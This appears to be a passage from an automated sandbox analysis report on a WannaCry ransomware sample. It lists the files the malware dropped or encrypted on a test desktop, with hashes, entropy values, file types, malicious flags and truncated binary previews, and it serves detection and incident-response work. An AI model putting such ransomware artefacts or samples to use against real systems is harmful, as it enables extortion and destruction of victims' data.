                                                  SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\Desktop\@WanaDecryptor@.exe.lnk

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\cscript.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                                  C:\Users\user\Desktop\BJZFPPWAPT.png

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.7891074325900505
                                                  Encrypted:false
                                                  SSDEEP:12:K0Np0hOjDECUi350o7fQKkaN7af73QGwSpi8e8tUAG3dwCmDlPvDNLnfuhWia/sn:K04i5RRN7aDQmmAGlmh1mek/wDBJpsOi
                                                  MD5:610CEA6428D56E4BD7B4A1F0AE85D610
                                                  SHA1:34E99353C6A1AC6C14CF62B7374EA86F051B58F8
                                                  SHA-256:9547E72138763DB1AEA4F014FEA8AA71D95811E156A0A4982F7E157CF402EAE3
                                                  SHA-512:F30B1E6B1DAA4C74DD9D15E802927C277DEDEDA91FBBD4C263DA3FF18E81AE0CEBDD70C31C91F994BB7B832CDFF3DE773D5A0F5DB85A5286AA21C29BA521D7C3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:...1..0.m+.2.m.Q...Yo..Da.V....O^....a.d..#,..o.'Pj.K>..7..s='.......Y.sq ^..2{....Qfz.Q..i+...._.*...|_..... .R.. ;...G.j....9 ...x.Q)..^_..>w.3M...9P.c.f.7...&....V...[n..(....d.X..,"Y..).V\..9.VO..44..x..qx8pW.z...z+.Uq.........f4.aD0.TCN5..Q..IS{g>.u.rjE$..c9.w.G...H.^Lo9..I.._e..N'g..1....$.....2\.Kk.xg...c.h2..Oi....A...p..9tb..l..F.u..F.X.p.......3...}q..B5.w.|._^i..T`7..|]wxJ..(.E.l..U.9.o....j...z.1a.$.(i..F..].|9r..E._>.. ._...f1.M.4..to..P..q...).Ll.UUB...H..1...50.U..n.E]^....D^.4.3... .S.>.@...... ......YMK..k0n........q.|.sz)=.X.E..../..)h...cu...W.<..va..`m..W......& .B..:k...M.{6.w...+..R.w..Z...5.V..|_.....>.o...........t{....S..uC.y..v.0...+>*h..ri]h.A's4/....yn,HbEmRTg..c3.p....g.."../.v......A..nB....|.T.~...ab......M@}..I...PNgS.."J?.A.sH..W.AF.0s.F.t.=. I...>..q6.8.db8.w..qN....M.....)..~...jW..[.z...w.._p4...B.C.`.T^.?...........\......x|07...M...>.O...OF../..B......[....F.S.V.W.(.... ..'D.-`.B".t.....g;.X.t...

                                                  C:\Users\user\Desktop\BJZFPPWAPT.png.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.834343836439562
                                                  Encrypted:false
                                                  SSDEEP:24:bk9AwFdP/7tsls9Gb6JCcjyt9yKZnqftDiFJm8xmrMUEZWWVFMmj:bk9LRelpb6Jw9yGnqfVsjUAZ
                                                  MD5:0CDF46E453459520C79E727AD74D9A5A
                                                  SHA1:92C04584BD494524493053D3512AF543F7674354
                                                  SHA-256:E1F0B9B5C618C76828FE7077E4ED24C0E88C13E5B6434D058743AEE07CDF63B7
                                                  SHA-512:5C1481EBC1EB25ECE06D3B8727834B7128104D9B45456B7B8ED0463EAC33BBB87BF461FC93BF87B029EE5AF0EFE065F82C77B7815DD2384FE28157CA5B0B05B8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....v3J.k....d.`..l=.....^..%.F....t.S1%.`...)..G...&.o...L.Z..[jBz..Q..L8$.,E7ZT.....n#N-T........w..l)w.W...xo.0|qN..;..]n=o.US.N..W..>..,]._....(.\...x..2.\xd...G...b....Fr...r(C....=.I.>s....h=YOtXA...+.Z29...2.I...`..".DD..:...z..M..T.f....@...............,fo.4..k.....'p...`..:&....k.IL#...0....&.......H.3.>K...6.@ 71.M...g..u".}.y......3P..c..g.=........p.NJ..!...E.s.ch.s..8...k....8u.........`...t.7v..R....J....v>....}....'Ry.35....:....!d...3+.&.m.f..H..*..A.6...J.@V6.\.Qx .(.....8...G...'.).F.v.0.]uA...A..D...2.W.L..B.l.,!.U.?...v..$...p`.;.-.z.....8W;.l.....o..*L.m.5...s...."...?.{././b..]1..'.B.J6L..i#zr....S4...#.D...'....D.,T.K........4.8O...=..h.{.A.x...j]vN......./.R.e.......G:..L....}bM...4....b3F.+m.).Q:...m..-.[....ysv3Y...9.(..Cf...HY>X..]6h..v..'9.K...h.^Ym...3m[.K...L.J.<.E..t:Zy..Z..".`.m../..dg...M....3SX'K....Zy.[.r....%.L...$..+.....6....2}.]UA....T[..0.D.9.[Lc...x: ..................Pm...-..h8DLH...G.5..'...

                                                  C:\Users\user\Desktop\BJZFPPWAPT.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.834343836439562
                                                  Encrypted:false
                                                  SSDEEP:24:bk9AwFdP/7tsls9Gb6JCcjyt9yKZnqftDiFJm8xmrMUEZWWVFMmj:bk9LRelpb6Jw9yGnqfVsjUAZ
                                                  MD5:0CDF46E453459520C79E727AD74D9A5A
                                                  SHA1:92C04584BD494524493053D3512AF543F7674354
                                                  SHA-256:E1F0B9B5C618C76828FE7077E4ED24C0E88C13E5B6434D058743AEE07CDF63B7
                                                  SHA-512:5C1481EBC1EB25ECE06D3B8727834B7128104D9B45456B7B8ED0463EAC33BBB87BF461FC93BF87B029EE5AF0EFE065F82C77B7815DD2384FE28157CA5B0B05B8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....v3J.k....d.`..l=.....^..%.F....t.S1%.`...)..G...&.o...L.Z..[jBz..Q..L8$.,E7ZT.....n#N-T........w..l)w.W...xo.0|qN..;..]n=o.US.N..W..>..,]._....(.\...x..2.\xd...G...b....Fr...r(C....=.I.>s....h=YOtXA...+.Z29...2.I...`..".DD..:...z..M..T.f....@...............,fo.4..k.....'p...`..:&....k.IL#...0....&.......H.3.>K...6.@ 71.M...g..u".}.y......3P..c..g.=........p.NJ..!...E.s.ch.s..8...k....8u.........`...t.7v..R....J....v>....}....'Ry.35....:....!d...3+.&.m.f..H..*..A.6...J.@V6.\.Qx .(.....8...G...'.).F.v.0.]uA...A..D...2.W.L..B.l.,!.U.?...v..$...p`.;.-.z.....8W;.l.....o..*L.m.5...s...."...?.{././b..]1..'.B.J6L..i#zr....S4...#.D...'....D.,T.K........4.8O...=..h.{.A.x...j]vN......./.R.e.......G:..L....}bM...4....b3F.+m.).Q:...m..-.[....ysv3Y...9.(..Cf...HY>X..]6h..v..'9.K...h.^Ym...3m[.K...L.J.<.E..t:Zy..Z..".`.m../..dg...M....3SX'K....Zy.[.r....%.L...$..+.....6....2}.]UA....T[..0.D.9.[Lc...x: ..................Pm...-..h8DLH...G.5..'...

                                                  C:\Users\user\Desktop\BNAGMGSPLO.pdf

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:OpenPGP Public Key
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.799921555501172
                                                  Encrypted:false
                                                  SSDEEP:24:qucE/o/2oDShx9qS+zu8OutH4BMa3GSqPg6qL8ue2/vjQhg:q3uUSha1zuxGXPZmem
                                                  MD5:DF4AA61F413063D04995DCF91F674D1E
                                                  SHA1:C2AFA5936CCAC4043DF376EBE004887EDB35C4D5
                                                  SHA-256:3C9A6740782AA91F7F72E203B6883359A409AE591B697651B43A3C8A2C004A4B
                                                  SHA-512:E856F14F7C4C3F61D3E1D7BBF21AED404716555CEB5FFA6519FFB305241F1213D61FEC1FD374BEE97359A3135F49B4628A84CD02307FFB821ECD210B49FA2DA2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:....._.....?.|Pd)..8..?.n}p....;..e.....l{.<zIc#....L...ti....F.`.T_.w_..^.h..._.sg..z......Y@!.Ev.Rl.n8..^.....c.A.5..M....8...Pa.l.......L.y...D...]...z..zV......Q./.Gj...d).L<.U.u.n../F..._... ..o..?d...gZ.Ma........R2.{.....a....O8YA1...\.E.7w 2.....fP...j~J....K_q...g.V............X!T..F.........._...H...M...2<h.....Zr...q.5........W../...'.T..R9z.....h.l% J.....{`.}....#.=.}(6.....0.!g.c.Z.<P..^.....L..u.V~.M....=._z(.....'...y|_c.<...^V2a..z8Y...:vv, ...Q....K...q...3...x..}.J^j..Bx.d...)@g..6....\p.tW.Az.-f.e..r...#.....-u^...[...k..t..1.<_5..v..~.!].I.:...=...t.p.8.[p.....<..b....W..........iZ.k.@.b...$C.....2(.7=...3...<O....@u.p.'..V.....zC.M..U@...B.g. ......`..7S.Q.`.<.v@.....U..+HE.P%w..m"G..G..'......C..>...A..y.x9_[QV...l.D.I.u..O-...AZ......w..:..._..+..R#l=hmX.*#+.c..a#m9.|..zM.r....1<t-!..p.......1.6m..~K..#.+DF.%....O..[.~.2.;.'../a]v.'G.R..H..i..D....#.F9..Q..1..{wjh...m..y..Q.9...n.!N.....r.y..eF.K...Q.l...2..h.V....<T*..

                                                  C:\Users\user\Desktop\BNAGMGSPLO.pdf.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.856561791528855
                                                  Encrypted:false
                                                  SSDEEP:24:bkeHOWvkXhZ8oO/9WIV3DivjjAPwuF5q8sBpjD2EJiA4acpyCTYE:bkeHOWvkXhSl/cIV+7jS/q8YFJiAZCT7
                                                  MD5:1B0DAB685CD90464360A0826A672365E
                                                  SHA1:DBC40AB16D41FE173C61F4140CAD2591D4312AE4
                                                  SHA-256:26F4B5DD8B74FCA54C48A305D9EED5F9BBAED1FED31373A3F6AE1F8BC76A2375
                                                  SHA-512:1EF49E1D4ECDA7EDB6FBC72ACD97DAC9061AC8D37066C045041ADD2C18118E43B8DF03E53411EBD6DD05F1959ACDD85B6B8EBA43EB8167C09FAB1B57B34471D0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....S.."._"..qNM'(.s.d5.$&.....$DT.`...J.}..;....5,..........7.........N..+o.c.C..t...o..X15.......{n........=.X\^..r..e......8.y...N.R19.{..?..Oab..`.ET...8t."...b.x..O..f<4...1.ag..5.m.?9..B....yKwd........I....*.d........mQ......g.^.U................~..N..6.....b.......F..@...O]A....`.........:Y..'.7%.L...t.MG...Hj!.....-...!..^..G.L...#..}..L.k.`.T/.(.*.$...^.E./.|n.KO.l....r..?..#6........"~..{."F.....n.2...r=...#.sb....3.8.*....<e.#.4.-.(..g&.J3....}.=L.....B.Dy...bY..$.,s.?....B..3.........e..W!.+.V.....M..~8"e......J.-F....v.H.......?.x.;Sm4.r?..._.M&=..:..q.W....eM.;0#.=.y.<q.#!..f.M.N.].gq|aEK...C..PO)..I..s..`:*a@`..sy..fN.@D.h.`*.+.eF...._.r.k.........7F......l...T..._rM..b.@..d1....vQ.)..K........\!.O....h.;..aH.+'...:......T.N..#b.G......e....dS. YQ#....,.B...v..yc.q).[...F..?..3A...(\.&.:1."[.1ks... 3....=...`..p...+..B...VI\6.w.z.......ye..c...../...W!.w9.W...N..&..>...<Q@.GD...>......J0+..CF....T.2o

                                                  C:\Users\user\Desktop\BNAGMGSPLO.pdf.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.856561791528855
                                                  Encrypted:false
                                                  SSDEEP:24:bkeHOWvkXhZ8oO/9WIV3DivjjAPwuF5q8sBpjD2EJiA4acpyCTYE:bkeHOWvkXhSl/cIV+7jS/q8YFJiAZCT7
                                                  MD5:1B0DAB685CD90464360A0826A672365E
                                                  SHA1:DBC40AB16D41FE173C61F4140CAD2591D4312AE4
                                                  SHA-256:26F4B5DD8B74FCA54C48A305D9EED5F9BBAED1FED31373A3F6AE1F8BC76A2375
                                                  SHA-512:1EF49E1D4ECDA7EDB6FBC72ACD97DAC9061AC8D37066C045041ADD2C18118E43B8DF03E53411EBD6DD05F1959ACDD85B6B8EBA43EB8167C09FAB1B57B34471D0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....S.."._"..qNM'(.s.d5.$&.....$DT.`...J.}..;....5,..........7.........N..+o.c.C..t...o..X15.......{n........=.X\^..r..e......8.y...N.R19.{..?..Oab..`.ET...8t."...b.x..O..f<4...1.ag..5.m.?9..B....yKwd........I....*.d........mQ......g.^.U................~..N..6.....b.......F..@...O]A....`.........:Y..'.7%.L...t.MG...Hj!.....-...!..^..G.L...#..}..L.k.`.T/.(.*.$...^.E./.|n.KO.l....r..?..#6........"~..{."F.....n.2...r=...#.sb....3.8.*....<e.#.4.-.(..g&.J3....}.=L.....B.Dy...bY..$.,s.?....B..3.........e..W!.+.V.....M..~8"e......J.-F....v.H.......?.x.;Sm4.r?..._.M&=..:..q.W....eM.;0#.=.y.<q.#!..f.M.N.].gq|aEK...C..PO)..I..s..`:*a@`..sy..fN.@D.h.`*.+.eF...._.r.k.........7F......l...T..._rM..b.@..d1....vQ.)..K........\!.O....h.;..aH.+'...:......T.N..#b.G......e....dS. YQ#....,.B...v..yc.q).[...F..?..3A...(\.&.:1."[.1ks... 3....=...`..p...+..B...VI\6.w.z.......ye..c...../...W!.w9.W...N..&..>...<Q@.GD...>......J0+..CF....T.2o

                                                  C:\Users\user\Desktop\EOWRVPQCCS.mp3

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.81632071911657
                                                  Encrypted:false
                                                  SSDEEP:24:ITFvD5hx/5oFFSIxKhaW+pft33QZmg2whnpssX1MFDR+feTr:0FvfxBASTbQF3ut5XuFkWTr
                                                  MD5:F8A5123CA0ED821F6F64D501F813988F
                                                  SHA1:F4EF3DD652E349F053B3086B49620256CCBF1C3F
                                                  SHA-256:0235EBC962844215FF04915223E57D53196C4E958493B8C4A1F3B6C5D6B78035
                                                  SHA-512:B9B321B2E1488EF72911F9DE2BDE81E73397E53344BB20CF0883F5F22D7DF797CE15B7F4D94733C1F25FC03AABD4A54B552AF95783B126E3AF777D450163E9FF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.kY..G.<.h5j{..3..3.=.."....E..=.._.O..$H.?. H....Q..W.e[.V...3.&..EQC.9%<.F._VKywjJ.x.@.7~.....S...j>...0.u.I.V.D.g.f.g=D......I.K...7.K.$............}...D.....h..h.....0e.?.-...h..b....F"i.v.o...j w.....W....@j......... D...2..."Z!&.R.8..K}...wYvO.6.._.C.Zt..@j.....u.......a..czD;uxo0..j.(.P......#.-.{.S..3....&...H.....Hr.j..v..<.Cbb...._s..7...|..|/..Od.<-....6Ji..n.)a.7...p.&.,;.D.`.a5.C..q.m..@.:.nY..c.....E.....AFO.....G..|o..;.X..#z.9.0.....q.q.{..,._.....8.r..a.$........%SAn....d;..g7...>wZA!.'..%.V..D...H..c.K^.4..Bj.=.H...f..D......h.!.....4)..4A.=*.&.l...(?,X.+.{.k........?.....A.UE...y.7..t...4..Y....l.i.9f......n._M.n.K..IX..`U..z..y.jx.......f.G.*....}....j...4@...9....9..x.....[.r..)xv........}.5...Z..~._.b............/..Gj.....a..................8..=V...=.N.!Cp..(^H.d...p...l....;LT.u}..F......!...h........z....K..}`.W.....?....g../.y&b.s...6RaU~.Y!.C.yLSGC...,.g .+;.........|Q..N.w...*.....p.6....k..=.RX....6...iE.

                                                  C:\Users\user\Desktop\EOWRVPQCCS.mp3.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.846832548568931
                                                  Encrypted:false
                                                  SSDEEP:24:bkho+gmM4Fq7l/8vC35ToM1ROXNI2d+uOkSE8gnftdI29pk:bkK+hMN7ivC3VoM1ROXBd+ISMnVdHM
                                                  MD5:0BCB104919493FDCB8B76896C16387A0
                                                  SHA1:0979538B61375F4E11BFAE7343DBAED27CECAEB5
                                                  SHA-256:DDB516870F1C99F4116341D0380F626AF8EDA272AF2724AD936DD79C078AD69C
                                                  SHA-512:CC590C109B326B96FE8019962E4E1DD5FD7F9B4D5C3A1704C0DDA8E8455BEC071249D64771C0BDECC004F53492302C9BD936D0D048D309F6577ABDD64DF2F90F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!...........{q.04.\3.:.....0.N.......+....r.g.H....~N..z.,C%..(!.RY...oeV...9..H.....k.O4...n..\.._..$.\.........x.w.^...}..N,@-aA;..Y..|..>....G..sta.8Zr/xj..k....#0u..(.5w.7..c..8..>v.jd.K.I....Yb.f*..@~..a....<.).dFuO._.0.BK"..D.. <)....C...r<xGj..]w............ ..............B....8.T)..P$...8Gl..9..o?I.f(e.H....0.^.=..~..h..m.N[.:K.4...Pmc.0....;..;.0./\sb..7<(.......@........g....w#...C...yL....>5,...Z.O..0....S....]2g.fd.i..Y..g<..M..r1h.../.N...Y...g]Cov..Dn...2.p.).D.%..|..|R(..8...?#.I.=...f....35z.!wk...u..O............KA....f...+.v..~W.....IT.....5..m........1...6k......K....qr.w....%...}eK....w......q..rb.3.9.s..V.E.*......A..b.&.8.HYe.._...o....D.l8.o~'ua&.V.........C...Mn.2.Nl.x}..%Q.A(.ee._n'.QY.....^...P..8.dk....W,.........}........u........O...2.?...AI8+d.3CB.....N...=`,q>..d .q}..%.)......OW......~Q...PB.o5(...q+.].q.....0_|d....fV...ZkSual.....G.".Z.Q>...3.'.F....n..e.p.y.4.....y..7bs...c..7./z".!...s...B.jN{.

                                                  C:\Users\user\Desktop\EOWRVPQCCS.mp3.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.846832548568931
                                                  Encrypted:false
                                                  SSDEEP:24:bkho+gmM4Fq7l/8vC35ToM1ROXNI2d+uOkSE8gnftdI29pk:bkK+hMN7ivC3VoM1ROXBd+ISMnVdHM
                                                  MD5:0BCB104919493FDCB8B76896C16387A0
                                                  SHA1:0979538B61375F4E11BFAE7343DBAED27CECAEB5
                                                  SHA-256:DDB516870F1C99F4116341D0380F626AF8EDA272AF2724AD936DD79C078AD69C
                                                  SHA-512:CC590C109B326B96FE8019962E4E1DD5FD7F9B4D5C3A1704C0DDA8E8455BEC071249D64771C0BDECC004F53492302C9BD936D0D048D309F6577ABDD64DF2F90F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!...........{q.04.\3.:.....0.N.......+....r.g.H....~N..z.,C%..(!.RY...oeV...9..H.....k.O4...n..\.._..$.\.........x.w.^...}..N,@-aA;..Y..|..>....G..sta.8Zr/xj..k....#0u..(.5w.7..c..8..>v.jd.K.I....Yb.f*..@~..a....<.).dFuO._.0.BK"..D.. <)....C...r<xGj..]w............ ..............B....8.T)..P$...8Gl..9..o?I.f(e.H....0.^.=..~..h..m.N[.:K.4...Pmc.0....;..;.0./\sb..7<(.......@........g....w#...C...yL....>5,...Z.O..0....S....]2g.fd.i..Y..g<..M..r1h.../.N...Y...g]Cov..Dn...2.p.).D.%..|..|R(..8...?#.I.=...f....35z.!wk...u..O............KA....f...+.v..~W.....IT.....5..m........1...6k......K....qr.w....%...}eK....w......q..rb.3.9.s..V.E.*......A..b.&.8.HYe.._...o....D.l8.o~'ua&.V.........C...Mn.2.Nl.x}..%Q.A(.ee._n'.QY.....^...P..8.dk....W,.........}........u........O...2.?...AI8+d.3CB.....N...=`,q>..d .q}..%.)......OW......~Q...PB.o5(...q+.].q.....0_|d....fV...ZkSual.....G.".Z.Q>...3.'.F....n..e.p.y.4.....y..7bs...c..7./z".!...s...B.jN{.

                                                  C:\Users\user\Desktop\GAOBCVIQIJ.docx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.825044871503022
                                                  Encrypted:false
                                                  SSDEEP:24:5AvgJmSNZj6YiA4JGHFXJbL7Um8Y+i0e6YyMyVC02w:evgJmQOAtZJfINY+G6YyMEh
                                                  MD5:BCC0779388487EF6F69C9B1D479E713C
                                                  SHA1:0D113DAAB6BA8A93B5381EF0433DC52BFDDFEA44
                                                  SHA-256:FAC97E995D83AECBB71576223E0E917335E4788AFCF66058EDEF1C5EF4E58D62
                                                  SHA-512:0C4734F7FA1B4A845F4882A93ABE94683FDA565DF39ACC6FB76A469196F422EA71F779F51AA9BEBA63266331B7A1AB648FF98798B6AF87AC5014EE0A01B8F884
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:XM.`..."../.........C....60...Q.y8V..F..!a...cS...H?..w u....8...O...(e...`....y.^O.W...9.Qsx.Q..*..`..cW...:..e4......X...,..Hb..p?x...N|T.}c../..,`..Q...F.........2.'G..@.d.i....0.....U....))..D...2..+`....|{...&B..<;.4...(.Z{..x}.T?.K.]..+W[DYF2]...3*J.).O.U....}.z.7>.Q..6.............Z..V.H.-..bn.......#vS.L\..L..Dy...W......%F-h...qzd...g...*..#.$...H.+..'.v8V..'....l _.......b../...O.Dld..(.h.V...E.q...B.....Z.zO,..T.G.V..b^..f..5o.5......-l......P]...qs?"D...i,.E..+Na+.....}.Z.J....HB...T.F.....Bv....p.@6...[\....d.g)...")...LX. b.{nX..._..n.....f..e..D%t..^|..P.Y...#2y...Q...a..../7.A+{.0. ..^.h.s..b.....mn.a...\.2..E.k..8..P...l...).....b-'Ii3d..aKS|.`d....p.K........Hk.H..F.z....g kx.........ft.7........M....".....K.d%1.B;:p.2....OE..3...vMa.V.$...,..*~...e^f .Z...85>.4...Jj.}.>s..Kd54yO.....LM...m...>+..C...Y...v.o.Q.....3r...X..9..^7;..5.@..'......[.....&..\([M.......a.`..q.-\../-.M:...R..S.frF.....`a.............D

                                                  C:\Users\user\Desktop\GAOBCVIQIJ.docx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.851544587590097
                                                  Encrypted:false
                                                  SSDEEP:24:bkEdjupj3q1O/zzwcJ9xLykglwnb6NvcpGzxVVrfXzB8lLGHEZoj5u68kzC5Ieh0:bkMy33/jbylSnb67djjB8R2o68k+5bvc
                                                  MD5:378900F9E5C10732DCC9746585F05D80
                                                  SHA1:745DE6893E23EA3C891773EEE2BCEB0964EA199A
                                                  SHA-256:BE94421D84E80D75B3AA574B40A21900ABA323D3151FFAF5DEEA77C2103448CA
                                                  SHA-512:E89CC8670D34AFB2B58424C5183E231A5C1AB5D08295AD7D74AF5AC30E8850DF90A4F43BAADEE5BDBEBE05E1554DC21DF43F4C922928491CE879A1BAC3A5743D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......cM..4T.:/.........y....I.-rU.a....@s..J..L .fHu...G......q....0..2V.x.;5.<.....D.H.;..K....v....I..0...Y>'.[Z..eT.E.!\&....F.8.f.T...*QTb..f.y...3......5(iy.(N.dc..l........m..d..+...&...-Ji..2..H..A2.3....U.p.3..1U......[PB....=.:..;r.va.6..A.............~......`.g^]..Y9G.@...L}1}..% 2.N.=Sl....b*.n.Lp..X...r*J...]...m.g|.Jn....<..K.....ma?M..=>.Y ....f.@~.V.I.R.......W.ct.n$8VO.......).Om.Z9..7>.-.%..l...<........z.-K.....0.G:T ._cD^.8W..$..Cn.K.4.o.......].e~d....\.......8...o.dt......~.#......'..\....x..B[...8.F?\.../U6...v..c..m..t..[.y.2..j....#YR....g.'.0.M.=.I.._.6d.n..y.g..9.Hm..O.3..NL.=..2.....1)Ux@...h...yh........BSb..s....rn7R)}M......84..h.]2b@..%..W.6j.v?..:.....yt...h....t.d......&y!*?..\.>8I....i...!..h4......(.h).L..qs`.t...-.&=\..85.Xn}G2Nm.j.+.B..^;......... ..Z$.5K.4.....N.PC.P.D.......}.E.p%.x.iK.aZd."...'.y>Y...s.Q..CR.b.$+...].B..C.q}..?....s.>CS.H1\....4..7.."y-...)j.?%.q....$5.,........7.\w...$...

                                                  C:\Users\user\Desktop\GAOBCVIQIJ.docx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.851544587590097
                                                  Encrypted:false
                                                  SSDEEP:24:bkEdjupj3q1O/zzwcJ9xLykglwnb6NvcpGzxVVrfXzB8lLGHEZoj5u68kzC5Ieh0:bkMy33/jbylSnb67djjB8R2o68k+5bvc
                                                  MD5:378900F9E5C10732DCC9746585F05D80
                                                  SHA1:745DE6893E23EA3C891773EEE2BCEB0964EA199A
                                                  SHA-256:BE94421D84E80D75B3AA574B40A21900ABA323D3151FFAF5DEEA77C2103448CA
                                                  SHA-512:E89CC8670D34AFB2B58424C5183E231A5C1AB5D08295AD7D74AF5AC30E8850DF90A4F43BAADEE5BDBEBE05E1554DC21DF43F4C922928491CE879A1BAC3A5743D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......cM..4T.:/.........y....I.-rU.a....@s..J..L .fHu...G......q....0..2V.x.;5.<.....D.H.;..K....v....I..0...Y>'.[Z..eT.E.!\&....F.8.f.T...*QTb..f.y...3......5(iy.(N.dc..l........m..d..+...&...-Ji..2..H..A2.3....U.p.3..1U......[PB....=.:..;r.va.6..A.............~......`.g^]..Y9G.@...L}1}..% 2.N.=Sl....b*.n.Lp..X...r*J...]...m.g|.Jn....<..K.....ma?M..=>.Y ....f.@~.V.I.R.......W.ct.n$8VO.......).Om.Z9..7>.-.%..l...<........z.-K.....0.G:T ._cD^.8W..$..Cn.K.4.o.......].e~d....\.......8...o.dt......~.#......'..\....x..B[...8.F?\.../U6...v..c..m..t..[.y.2..j....#YR....g.'.0.M.=.I.._.6d.n..y.g..9.Hm..O.3..NL.=..2.....1)Ux@...h...yh........BSb..s....rn7R)}M......84..h.]2b@..%..W.6j.v?..:.....yt...h....t.d......&y!*?..\.>8I....i...!..h4......(.h).L..qs`.t...-.&=\..85.Xn}G2Nm.j.+.B..^;......... ..Z$.5K.4.....N.PC.P.D.......}.E.p%.x.iK.aZd."...'.y>Y...s.Q..CR.b.$+...].B..C.q}..?....s.>CS.H1\....4..7.."y-...)j.?%.q....$5.,........7.\w...$...

                                                  C:\Users\user\Desktop\GAOBCVIQIJ.pdf

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.816488491819429
                                                  Encrypted:false
                                                  SSDEEP:24:mP0nagnuWOqkJV1fAez64SMXHEi7Kks6O0Q6nFPmuPP6:mMnwWODJVBFlHEiNsUQ6n0ua
                                                  MD5:A7AA06E714AFAD3E085BA0F5D7353939
                                                  SHA1:CDE0A010FE7544C646882EA7C503EE3701D67955
                                                  SHA-256:C3C6DF164895B3F81C6B3F3ADDE7CD114DEDA9CE30C852B255D5E8518EF51204
